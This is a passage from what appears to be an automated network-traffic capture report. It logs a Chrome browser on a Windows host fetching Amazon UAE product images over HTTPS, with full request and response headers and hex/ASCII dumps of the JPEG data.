                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: df cd 0f da 6f 89 d7 f1 bc bf e0 3c 2f e7 53 f6 86 3f 3a ff 00 b4 7c 30 ff 00 bc 50 d3 ca 3c e0 c8 97 fd 01 81 96 55 b8 6c a4 8b f6 e3 31 ca 01 60 c6 fc 35 38 d6 d4 b0 92 7a cb 20 62 7d 24 df ba 2e 62 da 70 31 07 a8 c7 2a ff 00 36 1c 10 45 c2 16 b3 03 e9 c2 11 6d 46 35 79 aa 56 32 d7 f1 62 8c 10 3c f9 9d cf da ee fe 68 7e d3 7c 4e bf 8d e5 9f d4 3c 2f e7 53 f6 86 3f 38 4f af 5f 0d a3 36 ce 88 5f b0 4b 35 97 d7 73 8f 1b 46 52 34 d0 60 73 b4 03 cc 38 63 40 29 a1 00 76 6e c7 77 88 af a5 23 db b6 00 2a 75 e1 d3 8b 2e 9d 7a 58 71 27 02 c9 df ac 13 4b 69 b8 84 eb db af 77 f3 43 f6 9b e2 75 fc 6f 2c fe a1 e1 7f 38 0f ab 5c 70 39 48 f4 a8 f0 da 8e f0 8f 28 02 e7 49 a4 c5 8e ba 0e ab 76 e2 e1 50 16 b7 68 18 e3 de f1 7e c0 ee 8b b2 55 d2 35 bf e3 a0 3f 71 c5 8e 52
                                                                                                                                                                                                                                                                Data Ascii: o</S?:|0P<Ul1`58z b}$.bp1*6EmF5yV2b<h~|N</S?8O_6_K5sFR4`s8c@)vnw#*u.zXq'KiwCuo,8\p9H(IvPh~U5?qR


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                95192.168.2.449968151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC715OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 39385
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 3a3c13c5-47d8-4f70-87dd-9ce55b9b6693
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 17 Aug 2021 17:25:24 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Mon, 29 Feb 2044 08:01:41 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 871583
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:35 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000071-IAD, cache-ewr18124-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3a 00 01 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 09 07 08 0a 02 03 04 05 06 01 0b 01 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 01 05 06 07 03 04 09 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 cf e0 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF:
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 9f 44 6b 82 93 da 88 47 b7 97 b2 f6 81 c6 5d b2 00 00 00 00 1e 5f d4 e8 7b f9 9b c8 ed 57 94 31 9a 99 66 a7 9b 2f ac a9 c5 9c d2 b1 cf c5 da 93 2f 9f aa a9 56 ba 3a f0 71 d5 d8 3e 29 c8 57 94 6d 9c a5 31 40 d5 19 74 f4 79 05 36 c0 00 00 05 7c 93 5a 9a 42 7d 42 88 5c 6e a7 3c 4a f8 8b e8 17 5b 68 ee 80 00 00 00 04 38 7a 9d 0f 7f 31 b9 1d aa c7 eb d0 5c 69 e4 89 08 2a c1 65 74 ac 44 71 76 65 ba 9f 55 b2 9f 5c 83 ad 35 9c 70 6f 1a cd e3 64 e4 98 a4 6a 7c b6 7c 3c 83 9b 60 00 00 03 b2 bb f4 a5 a7 db af 3f 69 7e 9d ce 63 53 c9 09 ac 00 00 00 00 02 1d fd 4a 87 ff 00 98 a4 92 d5 23 f4 8d 27 5c f0 e4 91 15 68 b1 7a 56 1b 38 bb 32 fd f3 f7 70 55 6f 52 bd 3d 1b 95 6d 1b 6a ef 1b 8a 6e a9 a1 5d f3 14 cd 4f 96 cf ef 90 73 6c 00 00 00 09 2b f5 be 14 d2 fd 3b 9c d9 27
                                                                                                                                                                                                                                                                Data Ascii: DkG]_{W1f//V:q>)Wm1@ty6|ZB}B\n<J[h8z1\i*etDqveU\5podj||<`?i~cSJ#'\hzV82pUoR=mjn]Osl+;'
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 00 00 00 00 0b e0 f4 4e 2f dd 2c c9 d1 23 a2 c7 2e b1 47 e2 b4 f8 e1 db fb 20 00 31 32 f4 c2 26 65 9b e6 7c b3 c4 5b d3 e8 83 97 4f 98 32 fb 8d c9 f3 e4 2e 7d 4f 71 68 ee f8 2b cf 47 14 df 49 e2 7e 5d fe 5f cb ef 03 7a e8 fb 3b 57 6f 97 c5 f7 c3 e5 f8 e6 71 7d 8c 5c 3d 16 8b 57 9b aa 73 39 60 8d 1b 6f 0c df 57 61 74 97 c7 dd 9f 7a 5a 9b 33 88 49 43 a8 3d 75 b3 b7 91 fc 0b 92 37 43 ae b2 98 a8 92 5a a2 2b 24 86 aa 97 68 bf b7 e3 52 40 6b 3a 69 90 5b 24 23 47 ec 29 a2 89 bb a8 00 07 32 e1 d6 95 cf 6a 60 3f 7b 91 da 80 b1 2f 37 a5 4d b3 c4 4d da 00 03 0f 9f 52 61 e6 60 de 5b 4c 3c 36 bd 58 86 13 c7 0c 77 e4 39 4a 8d 39 68 5b 47 0e c9 83 cf c9 37 0d f2 af 4c 58 a6 e3 c1 72 7c f3 c2 50 c4 fc 96 d4 dd 37 6f 82 9f 5f 2d b7 9b a9 f3 6c 86 20 dc 88 f3 17 1e ae 36
                                                                                                                                                                                                                                                                Data Ascii: N/,#.G 12&e|[O2.}Oqh+GI~]_z;Woq}\=Ws9`oWatzZ3IC=u7CZ+$hR@k:i[$#G)2j`?{/7MMRa`[L<6Xw9J9h[G7LXr|P7o_-l 6
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 8d bd 61 c9 93 0e f6 fa 3c 83 0d ea 87 44 b0 39 48 ab 87 7c 1b 93 74 43 59 ec b9 cd 83 3b 98 38 f7 07 d1 f2 ea 8d 7a 43 48 0f 0f b7 54 51 34 88 2a 2a 70 4c 81 ac c2 36 08 7b 53 22 9d c8 c9 3c f9 bd d4 da 0b d3 0e a6 2f 1e 8f 67 5c 4c 5f 73 d4 5f 20 7b 4d ac c5 e3 21 ec 0b 89 4b ee 7a cb e4 18 65 53 22 a5 88 f5 3c c9 bd d4 ba 4b d3 09 a8 9a c4 05 12 38 28 41 d4 60 1b 87 b6 75 69 18 98 54 68 37 ba 6d 03 64 ab df f7 01 d3 0e 9e b9 78 7c 6e 15 15 38 8b c0 1c c1 ed 76 af 1c b3 3e 36 ea 8a 7c 65 e0 1e 70 89 7d 46 83 8b 26 ec 36 32 bd ff 00 70 3d 11 af 48 7b 59 eb f6 cc 13 c6 b9 f4 8e f1 30 df 1a 26 33 97 4f ee 4b e6 5b f0 22 1c 3c fc 7e db 97 4e 5d 30 b1 2f 9e 6f c2 88 f0 73 71 43 27 ed 9f a7 8d 03 e9 0d fa 63 be 2f b5 26 b3 c4 99 5d 14 2c ab ae 1e f4 9c f0 b2
                                                                                                                                                                                                                                                                Data Ascii: a<D9H|tCY;8zCHTQ4**pL6{S"</g\L_s_ {M!KzeS"<K8(A`uiTh7mdx|n8v>6|ep}F&62p=H{Y0&3OK["<~N]0/osqC'c/&],
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: bd 9a 2c 20 04 a4 a6 3e 44 7f cd 0b 4d 13 68 38 66 4c dc ca c7 ff 00 19 03 61 d5 7d f1 6f 09 28 9b 84 c1 66 ea 02 e9 1b 48 1c a3 78 98 0f fa fc a6 3e 3a 5b f4 17 80 37 17 1c 18 77 43 cc 10 23 ab c7 03 dc fe dc 11 dc 97 c5 f3 c7 1f c2 8b e8 18 ef ff 00 6e 28 2f 04 17 51 ba c5 de 79 23 bd 08 2e b8 a8 7d 9f 5c fc 29 77 f8 61 fb 4b 65 ce d5 74 9c 27 bf 48 6e 10 dd 72 39 45 35 d3 de 2a 17 0f 53 53 bd f5 b6 24 1f 7e b7 d4 1d b9 93 30 3f 65 54 37 3d c1 78 e3 29 0c a7 4e 70 26 92 87 45 98 94 c5 13 86 92 02 82 6d 18 f8 b7 3a 8d c1 12 59 bc 8d 69 5c bd a4 a4 e8 cb d5 40 84 05 a4 ca ab 99 13 88 16 db f1 df 71 df 87 86 1a 95 ca 68 a6 90 4a dc e7 d2 d5 30 4d 7d da 82 1c 27 50 87 b6 9e 1b 42 f3 d6 12 39 61 cd 5a cc 9b 22 dd 40 02 03 45 54 22 eb ae 36 d3 d8 c9 8a e2 6e
                                                                                                                                                                                                                                                                Data Ascii: , >DMh8fLa}o(fHx>:[7wC#n(/Qy#.}\)waKet'Hnr9E5*SS$~0?eT7=x)Np&Em:Yi\@qhJ0M}'PB9aZ"@ET"6n
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 7f e9 87 af d4 7a 3f ea ce a8 0f e9 b3 7e a0 8c 4d 35 8c 4b b7 f1 2e de 16 14 de c5 74 36 a5 a7 62 1e e5 ff 00 30 45 3e 6d d1 47 9a 25 83 a0 b0 53 6e 42 00 74 12 2f aa 04 6c 91 bc 5f 3c 1b 5a bc 90 51 d5 cf 00 3a e0 a7 8c 5b de 60 8c 7b d8 c7 a6 27 27 c7 d5 06 b0 94 d8 8a 9a 8c 08 a0 7b e2 ca 8f a3 c5 70 ed 94 ba 96 78 b2 7c 0a 27 f2 80 84 54 07 c5 35 71 ef 30 07 f7 40 7b 7f 54 8f b0 84 eb f1 f9 7f e9 87 af d4 79 ec 6f 55 87 f4 d7 fe c5 28 9a 6b 18 97 fa e4 4b 77 84 85 37 a3 15 ee 8a 56 77 f1 41 f4 cb 12 03 6e 83 c5 12 b3 68 2c 14 db 90 82 8e f2 2f bc 1e 78 11 ec 43 e2 81 36 e9 4e 6f ae 00 da 60 0d 7b c0 1b 83 9e 31 68 0e 60 80 36 f2 1e 3f 65 2d 66 f2 67 32 70 0d 25 d2 d4 8e bc c1 d1 86 c0 9a 29 06 23 0c 52 33 65 ea 0c a5 b5 a8 9d 24 28 38 a8 a6 4b bb 33
                                                                                                                                                                                                                                                                Data Ascii: z?~M5K.t6b0E>mG%SnBt/l_<ZQ:[`{''{px|'T5q0@{TyoU(kKw7VwAnh,/xC6No`{1h`6?e-fg2p%)#R3e$(8K3
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 93 94 1b 4d 19 19 aa ad f6 22 ae 15 32 40 24 55 41 c2 a0 14 c0 21 b9 e7 80 93 ca 9d 4a 4a 59 7a ec 97 66 dc 56 db 6a af 6b dd a0 e9 00 6a 4d 92 6e c2 a1 84 54 c4 53 80 6e 6d 15 5b 04 18 bd a7 0e cd 62 3b 64 fc 84 51 ab b2 22 76 f9 cc 0e 33 47 13 24 ae e8 a3 88 be 38 30 ee 8f ce 31 93 0a 25 59 25 3b 27 aa 82 5c 0e e6 73 c4 8a e8 ce ac 07 32 48 1c 6e 9a 65 ef 74 69 1b 6b 18 ab e9 82 65 0c 1c 34 5d 8e 34 44 3e f0 99 5b 76 8a d8 74 18 87 d7 af 58 6a 8b 1d 33 a8 92 9e ba dc e7 4d 6b 6a c6 99 c5 33 5b c6 11 93 84 cc b5 75 4d 90 a1 7c 2a 2c 75 39 0a 9b 45 46 fe 5b 07 6c 97 7e f8 31 f8 d4 fe 98 44 d4 2d 32 7b f1 86 f9 74 f6 94 d3 3a a7 22 49 97 12 8a 0d 88 58 9b ac 13 59 c2 6c d9 1b 1b 09 29 8e 8b 65 38 15 7a 21 85 75 b9 93 0d c1 79 6f 08 22 46 e9 11 14 c2 c4 4f
                                                                                                                                                                                                                                                                Data Ascii: M"2@$UA!JJYzfVjkjMnTSnm[b;dQ"v3G$801%Y%;'\s2Hnetike4]4D>[vtXj3Mkj3[uM|*,u9EF[l~1D-2{t:"IXYl)e8z!uyo"FO
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 66 89 9d b8 50 6c 44 48 18 86 fe 2d 5c e3 0c a4 65 92 4a 4a cd 41 05 1c 28 22 a3 d3 06 92 e7 07 80 39 03 54 3d 41 1c 63 d8 8b cf 60 86 a0 00 25 b4 49 7b 98 44 37 31 4b 35 07 55 2b 22 18 2e 98 15 51 50 78 83 36 21 f3 8c 3a c9 95 25 39 36 75 f4 b1 17 0b 0f f1 c6 4c b8 c3 c7 ae 0b 91 4a 47 b8 6e 62 f2 67 9c 7d a4 06 44 a9 7f 73 37 9e 71 fe 78 f4 90 a5 fd cc de 79 cf da 47 a4 85 2d ee 66 f3 ce 7e d2 3d 24 29 4f 72 37 9e 73 f6 91 e9 25 4a 7b 99 fc fb 8f b4 8f 49 3a 57 dc cf e7 dc 7d a4 7a 49 d2 9e e6 a7 9f 71 f6 91 e9 29 49 fb 92 9e 7d cf da 47 a4 a5 25 ee 4a 79 f7 3f 69 0c 72 4f 4b cb 54 2a cc d8 a4 83 82 6f 5c 82 44 ce fe 78 ee be 58 42 95 64 8e a3 98 61 16 09 21 bd bc 00 5b b5 d3 04 c5 30 39 fd cd 31 f9 44 02 2a b4 b4 33 5b 8b 11 47 e4 10 ed 86 85 4a 30 ed
                                                                                                                                                                                                                                                                Data Ascii: fPlDH-\eJJA("9T=Ac`%I{D71K5U+".QPx6!:%96uLJGnbg}Ds7qxyG-f~=$)Or7s%J{I:W}zIq)I}G%Jy?irOKT*o\DxXBda![091D*3[GJ0
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 92 7a c6 4e e2 43 30 59 54 c0 84 74 d4 ea 18 a0 a8 61 50 48 62 18 48 50 01 01 b7 17 0c 65 5e ad 73 48 52 6b 3c 60 6c dc cd fa 85 6c c1 5b 5f 36 63 80 98 4f a7 88 a5 1b 72 c5 09 91 86 95 5c 91 1a 92 a7 9a bb 05 e6 e2 65 51 49 13 27 8f 0e 21 0c 6a 1d 62 a9 71 36 b8 af e9 51 a3 ab 19 14 9c 26 cb 4d 9a 82 2d 94 97 99 7d fa 08 8b a5 0b 9a d7 6b 00 94 47 45 b5 c6 55 ea d7 34 7d 26 b3 c6 06 c1 33 7e a1 5b 30 56 d7 cd 98 e5 13 09 fc 45 28 db 96 28 6c 8d b0 a9 e4 68 d4 b5 64 c9 db 87 d3 b0 15 52 29 15 00 10 21 87 72 73 99 42 9c 4c 61 d7 14 02 d3 0a 0f 2a 4f 72 7d b3 ce f6 4e e8 4c 09 90 da 8a 61 6d b3 13 3d b8 0d 87 72 6b 46 5c 1c 3a 69 94 9a 65 db 11 00 7a d5 9b 35 19 88 ea ce 91 fa e6 2d fc 70 db 23 35 03 e9 e4 be a7 a9 6b 4d 9b 35 6a e1 17 0b 20 0d cc a1 3b 12
                                                                                                                                                                                                                                                                Data Ascii: zNC0YTtaPHbHPe^sHRk<`ll[_6cOr\eQI'!jbq6Q&M-}kGEU4}&3~[0VE((lhdR)!rsBLa*Or}NLam=rkF\:iez5-p#5kM5j ;
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 11 d8 31 34 c3 33 67 42 4c e0 17 34 e0 8b 6f 6e 5e f2 32 7d 48 1e 88 90 6d 2a 8f c2 62 39 f5 15 d9 00 9e 6f 7e 01 a2 d8 8d c5 19 48 c9 62 d5 ec ca 5e fd 39 d1 65 80 c9 0c d0 a6 28 0a b8 b7 62 7b e8 39 78 e2 75 26 97 d4 12 b7 92 79 a2 3b 21 8b e2 e1 58 9c 3a ee 02 1c a0 3a 42 12 c8 75 53 27 74 b0 53 55 da 92 d6 2b 8e ec 4a 2e 1b ab 6e 0c 40 81 ac 68 75 90 22 a8 e2 5a f4 95 4a ab cc 11 30 1e 6a f1 c2 42 a8 b8 38 18 04 2d d9 37 3a b8 44 62 6f 29 61 3d 96 bb 94 cd 1b 83 96 2f 4b 85 74 87 cb 70 10 d4 21 ac 06 07 21 95 14 9d ca ca 52 15 c2 b2 d4 16 e0 13 2e dd 5b 71 18 cd 8d ba f2 04 51 b9 35 9d c8 e7 48 4f ea 1a c5 c5 40 e9 b1 0e 54 5a 9c 55 39 0a 2a 17 00 8e 25 ce 61 e1 e2 08 af 32 58 b5 67 52 cb 67 e4 9d 16 5e 59 7a 08 a4 2d 45 01 53 16 69 75 16 be 2c 65 ef
                                                                                                                                                                                                                                                                Data Ascii: 143gBL4on^2}Hm*b9o~Hb^9e(b{9xu&y;!X::BuS'tSU+J.n@hu"ZJ0jB8-7:Dbo)a=/Ktp!!R.[qQ5HO@TZU9*%a2XgRg^Yz-ESiu,e


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                96192.168.2.449970151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC715OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 59849
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: b112d19e-9ca8-4d88-81c3-d1618fa2e02d
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 17 Aug 2021 17:25:24 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sun, 28 Feb 2044 07:52:10 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 970715
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:35 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100154-IAD, cache-nyc-kteb1890058-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3c 00 01 00 02 02 02 03 01 01 00 00 00 00 00 00 00 00 00 08 09 07 0a 05 06 02 03 04 01 0b 01 01 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 08 05 06 07 09 02 03 04 01 0a 0b ff da 00 0c 03 01 00 02 10 03 10 00 00 00 df e0 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF<
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: ff 00 49 5b f7 ce b9 e3 14 5e 5e 71 d7 ae ba 59 2a a7 72 3d 76 c7 46 c5 f5 9e c3 6e d4 61 ae 24 9a 88 ff 00 92 b6 40 bc 20 f8 00 00 00 b0 3d 9f 44 69 05 27 b1 10 af 6d 5e cb dc 07 19 72 c8 00 00 00 fd e7 c7 93 da 4c 47 ee f3 43 03 f6 bc 77 74 f1 71 73 2d 7c 76 55 c1 c0 58 d7 07 2b 90 2d ff 00 b7 22 da d8 9b 56 92 e3 c7 9f 1f 2e be 40 0d 16 76 45 1a 2b c7 2d 5a 37 8b a6 7d ee 58 35 f3 1a e6 0c a7 88 54 af cb 3a 4b 4b cf 08 d7 35 47 cb 6b f8 ee 93 d8 a3 14 bf ad ee a9 3b b6 ad b7 af 70 00 00 01 9f 24 d6 26 b0 9d a1 44 2f 9b c9 df 52 ba 45 d8 17 1b 48 f6 80 00 00 0f 5e c4 23 47 15 b2 f8 a5 ea f5 f4 c8 bb 5a ad db 3c 7d 9c 97 9f ef c3 ea ed f3 e1 f7 5a 09 43 65 c0 3c 5f 93 69 8f 68 58 67 e5 a6 74 48 b8 e7 7a 66 fc 57 70 e6 4c 6b 70 d7 ad 4f c7 27 b0 0e 4e eb
                                                                                                                                                                                                                                                                Data Ascii: I[^^qY*r=vFna$@ =Di'm^rLGCwtqs-|vUX+-"V.@vE+-Z7}X5T:KK5Gk;p$&D/REH^#GZ<}ZCe<_ihXgtHzfWpLkpO'N
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 16 35 02 4b f8 eb 54 59 77 14 76 6e 0b 37 c4 19 46 44 d8 19 17 27 74 de b6 f1 e9 c5 3c a4 85 c3 d1 ca 52 c7 dc a9 ae a9 d9 b4 96 aa e4 e8 00 00 00 19 7b 3a 63 ce db 7b db f1 d2 2a 66 30 00 00 00 23 96 58 b4 71 8e d1 62 7e 6a cf 38 f3 b9 79 39 7b f4 eb 36 7b a4 7f c8 df a7 e8 3f 40 3f 7e 00 ac 3c af 6d eb 1f 23 68 91 57 36 d0 b2 85 8d 24 2d f3 15 62 5e bf 75 5b 58 43 22 da 93 fa e0 c6 90 4a 7e c5 79 59 84 b2 16 4b d7 5c f9 d8 3e 19 5d de 5f 00 00 00 02 45 ca bc 39 df 32 5d a7 0e 20 4c 8f 00 00 00 1f 9f 5d 13 df d1 19 33 5d 87 ce ec aa 2e c8 2c cd 64 45 7d 1a cf 9f bf cd cf eb e1 cf ed e1 cb b4 f8 fb f9 5e 9e 7e 67 23 d5 cf 95 ea e7 c9 75 73 fb b8 72 fa b8 72 d7 33 2c d3 a0 44 a2 bf a3 fd bd 90 6e 2e 33 e2 4c d9 7a d9 d9 8e fd b1 e6 c6 24 af 76 5b 4e b5 91
                                                                                                                                                                                                                                                                Data Ascii: 5KTYwvn7FD't<R{:c{*f0#Xqb~j8y9{6{?@?~<m#hW6$-b^u[XC"J~yYK\>]_E92] L]3].,dE}^~g#usrr3,Dn.3Lz$v[N
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 9e 1c a5 4f 9f ba cc 3c 7e 8a 89 a8 79 71 5f 67 5e d3 d4 2a af 73 e3 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 49 1b 9e 87 b5 0d 06 ad 46 15 4f 04 44 f4 74 d9 07 8b d5 57 7e df 36 d5 f4 2a a6 ad 15 da 5e d8 54 0a b4 a1 e9 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8a 9f 86 ed a9 9e ed 65 6b 54 dc 9f c3 95 e8 d2 fd da 6d 5c 54 6d 9c e8 b5 4a 50 a9 78 b6 63 a2 d4 b2 4f 0e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 48 75 2f 1d 98 f8 fd 12 2f a7 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff c4 00 4d 10 00 01 04 01 01 06 01 07 06 09 09 07 05 01 00 00 03 01 02 04 05 06 07 00 11 12 13 14 15 21 08 22 30 31 32 41 54 10 16 20 23 33 40 17 24 35 42
                                                                                                                                                                                                                                                                Data Ascii: O<~yq_g^*sIFODtW~6*^TekTm\TmJPxcO@Hu//M!"012AT #3@$5B
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: ee fc 64 49 e0 ef 43 65 3d 95 f1 9c 67 78 bd 7c 02 c2 95 e7 23 ca 57 71 10 8b bd ce fb aa 64 38 7a 66 23 c4 a7 34 67 bd 9b 3e d4 a2 db 54 f3 4b 93 50 d5 63 76 b1 12 b5 2f e2 c6 b1 95 25 5f 7a 39 07 9e 7c 55 a0 9b 0c 61 95 1d c9 98 cb d5 ef 27 9c f6 fa 5d 5b 2a 65 4a 81 78 36 55 e2 b6 36 58 46 1f a0 54 18 ce 3c b6 35 19 08 a2 8f 22 26 27 85 e3 a0 d4 ad 63 af 95 45 10 cb 68 fa eb 48 d2 ed 62 e3 c9 59 a7 f6 38 f4 88 e2 ac c5 ac e2 46 a9 95 51 83 1a 9b 54 b2 dc e0 12 04 da dc be be 00 65 c3 c3 99 82 17 19 cf 74 b3 35 48 8d af c0 6e 27 12 54 0d 43 d5 5c 03 55 8d 8d 41 c6 d4 f6 76 83 8b 60 b6 40 c3 a2 dd 02 e6 89 c0 c7 eb 69 63 3a 48 3a 8f a6 22 bc 04 61 44 ee 12 0d 77 b5 d5 b3 d9 61 19 a6 6f 83 d3 c0 cc fa 6a a8 d4 57 39 77 35 be 2a b6 d6 0b 61 29 5e 9f 62 3f
